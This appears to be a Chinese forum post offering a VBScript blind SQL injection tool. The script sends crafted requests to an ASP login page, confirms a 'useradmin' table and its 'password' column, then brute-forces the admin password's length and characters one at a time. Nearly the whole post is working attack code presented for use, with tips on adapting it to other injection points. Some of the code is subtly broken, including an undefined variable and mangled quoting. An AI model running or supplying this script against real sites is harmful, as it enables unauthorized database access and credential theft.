| By:jinsdb[B.C.T]
有人用Microsoft ACT提供的Test.SendRequest("http://"; & g_sServer & "/testfiles/browser.asp")方法写了一个vbs注入工具.
不过利用改对象还要装一个几十M大的工具包,我这里仿照给脚本,采用Microsoft.XMLHTTP来实现,利用open函数提交,对有注入的页面进行密码破解:
RightW = "OK!" ';定义正确页面返回的关键字.
tablename = "useradmin" ';定义表名,列名,本程序不提供表名,列名猜测功能,仅仅提供密码猜测.
filedname = "password"
WScript.Echo "Start check the tname and the fname,please waiting... ..."
URL="http://127.0.0.1/fwork/f.asp?username=admin&password=abzvc" ';有注入漏洞的url地址,下面提供的是针对字符型漏洞的注入,数字型只需要稍微更改即可.
Set xPost = createObject("Microsoft.XMLHTTP") ';检测表名是否正确
sURL1=URL&"';%20and%20(Select%20Count(1)%20from%20[useradmin])>=';0"
xPost.Open "POST",sURL1,0
xPost.Send "1212312"
If instr(xPost.responseText,RightW) <> 0 Then
WScript.Echo "table name is:"&useradmin
End if
sURL2=URL&"';%20and%20(Select%20Count([useradmin].[password])%20from%20[useradmin])>=';0" ';检测列名是否正确
xPost.Open "POST",sURL2,0
xPost.Send "1212312"
If instr(xPost.responseText,RightW) <> 0 Then
WScript.Echo "field name is:"&filedname
End if
WScript.Echo "Start gussing,Waiting... ..."
For i = 0 to 128 step 1 ';猜测密码长度
sURL3=URL&"';and+(select%20username%20from%20useradmin%20where%20len(password)=';"&i&"';%20and%20username=';user';)>=';0"
xPost.Open "POST",sURL3,0
xPost.Send "1212312"
If instr(xPost.responseText, RightW) <> 0 Then
Exit For
End If
Next
pwd_len = i
WScript.Echo "the pass length is:"&pwd_len
pwd = "" ';猜测密码
strings = "0123456789abcdefghijklmnopqrstuvwxyz" ';自定义密码字符串
For j = 1 to pwd_len step 1
For k = 1 to len(strings) step 1
sURL4=URL&"';%20and%20(select%20username%20from%20useradmin%20where%20left(password,"&j&")%20=';"&pwd&mid(strings,k,1)&"';%20and%20username=';user';)>=';0"
xPost.Open "POST",sURL4,0
xPost.Send "1212312"
If instr(xPost.responseText,RightW) <> 0 Then
pwd = pwd & mid(strings,k,1)
Exit For
End If
Next
Next
If errn Then
WScript.Echo "error:" & Error.Description
Error.Clear
Else
WScript.Echo "!!!Password:" & pwd
End If |
